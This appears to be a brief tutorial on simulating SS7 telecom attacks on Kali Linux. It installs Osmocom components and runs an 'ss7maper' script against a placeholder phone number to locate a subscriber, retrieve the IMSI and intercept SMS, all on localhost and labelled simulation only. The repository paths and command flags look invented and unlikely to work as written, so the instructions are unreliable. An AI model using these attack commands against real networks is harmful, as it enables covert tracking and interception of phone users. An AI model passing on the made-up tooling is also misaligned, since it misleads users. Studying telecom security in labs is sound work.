SIMULATING SS7 ATTACKS ON KALI LINUX
For Educational & Legal Use Only - No real network interaction.
What You Will Achieve:
- Simulate an SS7 network on your Kali Linux system.
- Test simulated attacks like Location Tracking, IMSI Retrieval, SMS Redirection.
PART 1: UNDERSTAND THE SS7 ARCHITECTURE
- SS7 Protocols: SCCP, MAP, M3UA
- Components: HLR, STP, MSC, VLR
PART 2: INSTALL AND CONFIGURE TOOLS
Step 1: Update Kali
sudo apt update && sudo apt upgrade -y
sudo apt install git build-essential cmake autoconf automake libtool \
libtalloc-dev libpcsclite-dev libosmocore-dev wireshark python3-pip -y
Step 2: Install Osmocom Tools (osmo-hlr, osmo-stp)
git clone https://gitea.osmocom.org/cellular-infrastructure/osmo-hlr.git
cd osmo-hlr && autoreconf -fi && ./configure && make && sudo make install
git clone https://gitea.osmocom.org/cellular-infrastructure/osmo-stp.git
cd osmo-stp && autoreconf -fi && ./configure && make && sudo make install
Step 3: Configuration
sudo mkdir -p /usr/local/etc/osmocom
Configure osmo-hlr.cfg and osmo-stp.cfg as provided in the guide.
Step 4: Run Components
osmo-hlr -c /usr/local/etc/osmocom/osmo-hlr.cfg
osmo-stp -c /usr/local/etc/osmocom/osmo-stp.cfg
PART 3: SIMULATE ATTACK USING SS7MAPer
git clone https://github.com/Lochnair/ss7maper.git
cd ss7maper && pip3 install -r requirements.txt
Edit config.ini with host=127.0.0.1, port=2905, timeout=2
Simulated Attacks:
python3 ss7maper.py --target +919999999999 --locate
python3 ss7maper.py --target +919999999999 --imsi
python3 ss7maper.py --target +919999999999 --intercept
PART 4: WIRESHARK MONITORING
sudo wireshark &
Use filter: m3ua || sccp || map
LEGAL NOTICE: Simulation only. Never connect to real networks.